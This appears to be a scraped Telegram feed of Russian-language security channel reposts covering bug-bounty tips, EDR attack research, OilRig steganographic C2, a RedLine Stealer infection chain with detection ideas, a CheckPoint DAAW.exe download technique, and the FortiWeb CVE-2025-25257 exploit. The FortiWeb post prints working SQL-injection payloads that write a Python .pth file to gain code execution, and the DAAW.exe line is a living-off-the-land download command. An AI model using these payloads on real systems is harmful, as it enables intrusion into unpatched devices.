Forwarded from 🕷 BugBountyRu
💡 Фича-флаги для багхантера
Обращайте внимание на всё, что в HTML содержит
Иногда достаточно:
▪️ поменять
▪️ или добавить строку в массив через
⚙️ Больше включённых фич → больше функциональности → шире зона охвата → больше уязвимостей. Проверяйте скрытые возможности — они любят ломаться первыми.
Обращайте внимание на всё, что в HTML содержит
featureFlag или просто flag. Часто разработчики проводят A/B-тесты, и фичи «выключены» у вас на глазах.Иногда достаточно:
false на true,match-and-replace в Burp.⚙️ Больше включённых фич → больше функциональности → шире зона охвата → больше уязвимостей. Проверяйте скрытые возможности — они любят ломаться первыми.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Forwarded from Whitehat Lab
InfoGuard Labs
Attacking EDRs Part 1: Intro & Security Analysis of EDR Drivers - InfoGuard Labs
This article gives an overview of the attack surface of EDR software and describes the process to search for attack surface on EDR drivers from a low-privileged user.
Подборка материалов по атакам на EDR системы (англ.)
#edr #analysis #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from s0ld13r ch. (s0ld13r)
Novel C2 abusing Exchange Web Services and Steganography 👾
Люблю нетривиальные реализации TA0011 Command and Control, особенно со стегой🎩
Команда Unit 42 разобрали бэкдор RDAT, связанный с группой OilRig. В свежих сэмплах — новая C2-инфра и интересный флоу🥳
Как работает:
• Иcпользует API Exchange Web Service как C2 канал 📧
• Снижает WINHTTP_OPTION_AUTOLOGON_POLICY до Low → автологин на Exchange через креды текущего юзера🪟
• Создаёт inbox rule → письма с C2 адресов летят в junk🗑
• Мониторит спам и вытаскивает команды из BMP-вложений 🖼
📤 Эксфильтрация — тоже через BMP, упакованные в черновики и отправленные с заражённого хоста на почту оператора
🔗 Research: https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/
🧢 s0ld13r
Люблю нетривиальные реализации TA0011 Command and Control, особенно со стегой
Команда Unit 42 разобрали бэкдор RDAT, связанный с группой OilRig. В свежих сэмплах — новая C2-инфра и интересный флоу
Как работает:
• Иcпользует API Exchange Web Service как C2 канал 📧
• Снижает WINHTTP_OPTION_AUTOLOGON_POLICY до Low → автологин на Exchange через креды текущего юзера
• Создаёт inbox rule → письма с C2 адресов летят в junk
• Мониторит спам и вытаскивает команды из BMP-вложений 🖼
📤 Эксфильтрация — тоже через BMP, упакованные в черновики и отправленные с заражённого хоста на почту оператора
🔗 Research: https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Threat Hunting Father 🦔
Малварь маскируется под инсталлятор:
idp.dll — legit плагинidp.exe — 7za.exe (распаковка)ImageConverter.exe — фейк-декой.iss Pascal script: скрытый запуск, WMI-чек, скачивание архиваXOR-обфускация строк (процессы, пользователи, модели VM)
WMI-запросы:
Win32_Process, Win32_ComputerSystemПроверка имён типа
application_stable_release, detection VM/AVTinyURL → rentry[.]org (auth header rentry-auth)Ответ: ссылка на
package.zipРаспаковка:
idp.exe x -p<password> (T1027.015)⛓ Persistence через планировщик (T1053)
Создание задачи:
schtasks /Create /xml lang WhatsAppSyncTaskMachineCore /fФайл
taskshostw.exe → %localappdata%\Programs\Common\ с hidden-атрибутами💣 DLL sideloading → Shellcode → HijackLoader
ScoreFeedbackTool.exe загружает троянизированный QtGuid4.dllДешифруется
periphyton.ics → shellcodeShellcode тянет
HijackLoader из glucoprotein.php (PNG-like, XOR + LZNT1)Распаковка через
RtlDecompressBuffer(), поиск IDAT-чанков🧠 HijackLoader → MSBuild → RedLine
Инжект в
MSBuild.exe (T1127.001)Модификация
.text в системных DLLИспользует: Call Stack Spoofing, Hollowing, Heaven’s Gate
Payload — RedLine Stealer (.NET)
🔍 RedLine Stealer
Обфускация Constant unfolding (T1027.010)
Браузеры (Chrome, Edge, Brave, Iridium, etc.)
Расширения криптокошельков (MetaMask, Binance, TRONLink)
Chrome с
--no-sandbox, --user-data-dir (T1497)IE
-extoff для загрузки страниц без расширений (T1562.001)WMI: OS, процессор, память, видео
🛡 Detection идеи (Splunk rules)
📍 Доступ к Chrome
Local State из non-chrome процессов🧱 Unsigned DLL sideloading
📅 Hidden scheduled tasks
🧩 Chrome с
--no-sandbox и --user-data-dir🧬 IE
-extoff вызовы🧩 Цепочка построена на легитимных инструментах — Inno, Pascal, 7za, WMI, MSBuild, DLL — для обхода детекта. Эффективный hunting требует поведенческого анализа, контроля сетевых запросов к paste-сервисам и runtime-анализа планировщика/библиотек.
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from AlexRedSec
#mitre #matrix #appsec #application #ttp #mitigation
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from s0ld13r ch. (s0ld13r)
Немного Living off the Land в студию 😏
В ходе моего предыдущего небольшого ресерча и игр в консоли, наткнулся на интересный вектор доставки C2/нагрузок на хост через VPN клиент CheckPoint, при желании данный вектор можно зачейнить не попадаясь под внимание стандартных правил обнаружения и реализовать технику T1105 – Ingress Tool Transfer🙏
В стандартном пути VPN клиента есть бинарник DAAW.exe, позволяющий скачивать файлы по аналогии с wget, его же и можно использовать как легитимный загрузчик🎩
Powershell👩💻
Detect🛡
P.S Детект больше как псевдокод, лучше адаптировать под сами СЗИ
🧢 s0ld13r
В ходе моего предыдущего небольшого ресерча и игр в консоли, наткнулся на интересный вектор доставки C2/нагрузок на хост через VPN клиент CheckPoint, при желании данный вектор можно зачейнить не попадаясь под внимание стандартных правил обнаружения и реализовать технику T1105 – Ingress Tool Transfer
В стандартном пути VPN клиента есть бинарник DAAW.exe, позволяющий скачивать файлы по аналогии с wget, его же и можно использовать как легитимный загрузчик
Powershell
C:\Program Files (x86)\CheckPoint\Endpoint Connect\DAAW.exe downloadFile -url <URL> -fileName <PATH>
Detect
process.executable: "DAAW.exe" and process.command_line: "downloadFile"
P.S Детект больше как псевдокод, лучше адаптировать под сами СЗИ
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
Создан вариант утилиты Lossless Scalings Frame Generation для Linux
Проектом lsfg-vk подготовлен неофициальный порт утилиты Lossless Scalings Frame Generation (LSFG) для платформы Linux, использующий DXVK и графический API Vulkan. Код проекта написан на языке C++ и размещён под лицензией MIT. Разработка выполнена сторонним…
🔗Ссылка:
https://opennet.ru/63545/
https://opennet.ru/63545/
Forwarded from PurpleBear (Vadim Shelest)
Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector
Опубликованы технические детали и эксплоит для уязвимости CVE-2025-25257 (оценка по CVSSv3=9.6) в компоненте экосистемы
По сути это классическая SQL-инъекция в функции
Далее не менее классический способ
Python supports a feature called site-specific configuration hooks. Its main purpose is to add custom paths to the module search path. To do this, a .pth file with an arbitrary name can be put in the .local/lib/pythonX.Y/site-packages/ folder in a user's home directory:
И обходом ограничения на
Таким образом, получаем прекрасный отчет от исследователей из
⚙️ POC: https://github.com/watchtowrlabs/watchTowr-vs-FortiWeb-CVE-2025-25257
🪲 Уязвимые версии ПО:
✅ Рекомендации: Необходимо обновиться до последних актуальных версий
Опубликованы технические детали и эксплоит для уязвимости CVE-2025-25257 (оценка по CVSSv3=9.6) в компоненте экосистемы
Fortinet, именуемом FortiWeb Fabric Connector😜 Который обеспечивает автоматизированное взаимодействие между различными компонентами (FortiWeb WAF, FortiGate NGFW, FortiManager, FortiWhatever) согласно описанию продуктовой линейки Fortinet.По сути это классическая SQL-инъекция в функции
get_fabric_user_by_token, которая обеспечивает аутентификацию для различных интеграций с FortiWeb API. Эта функция передает контролируемый атакующим char *a1 инпут в заголовок Authorization: Bearer %128s на эти ручки:GET /api/fabric/device/status HTTP/1.1GET /api/v[0-9]/fabric/widget/[a-z]+
GET /api/v[0-9]/fabric/widget
Host: fortiweb_ip
Authorization: Bearer AAAAAA'or'1'='1Далее не менее классический способ
RCE в MySQL через INTO OUTFILE неожиданно запущенном от root🙈 А именно загрузка веб-шелла в cgi-bin веб-сервера Apache с хитрым трюком обхода ограничений запрета на перезапись исполняемых файлов через эту технику из исследования SonarSource:Python supports a feature called site-specific configuration hooks. Its main purpose is to add custom paths to the module search path. To do this, a .pth file with an arbitrary name can be put in the .local/lib/pythonX.Y/site-packages/ folder in a user's home directory:
'/**/or/**/1=1/**/UNION/**/SELECT/**/'import os;os.system(\\'ls\\')'/**/into/**/outfile/**/'/var/log/lib/python3.10/site-packages/trigger.pthИ обходом ограничения на
128-character limit в заголовке Authorization: Bearer'/**/UNION/**/SELECT/**/token/**/from/**/fabric_user.user_table/**/into/**/outfile/**/'../../lib/python3.10/site-packages/x.pth'
Таким образом, получаем прекрасный отчет от исследователей из
watchTowr с наглядным и понятным описанием технической эксплуатации уязвимостей с нотками тонкой иронии и интересным трюком, который можно взять на вооружение👍⚙️ POC: https://github.com/watchtowrlabs/watchTowr-vs-FortiWeb-CVE-2025-25257
🪲 Уязвимые версии ПО:
FortiWeb 7.6.0 до 7.6.3, FortiWeb 7.4.0 до 7.4.7, FortiWeb 7.2.0 до 7.2.10, FortiWeb 7.0.0 до 7.0.10✅ Рекомендации: Необходимо обновиться до последних актуальных версий
watchTowr Labs
Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257)
Welcome back to yet another day in this parallel universe of security.
This time, we’re looking at Fortinet’s FortiWeb Fabric Connector. “What is that?” we hear you say. That's a great question; no one knows.
For the uninitiated, or unjaded;
Fortinet’s…
This time, we’re looking at Fortinet’s FortiWeb Fabric Connector. “What is that?” we hear you say. That's a great question; no one knows.
For the uninitiated, or unjaded;
Fortinet’s…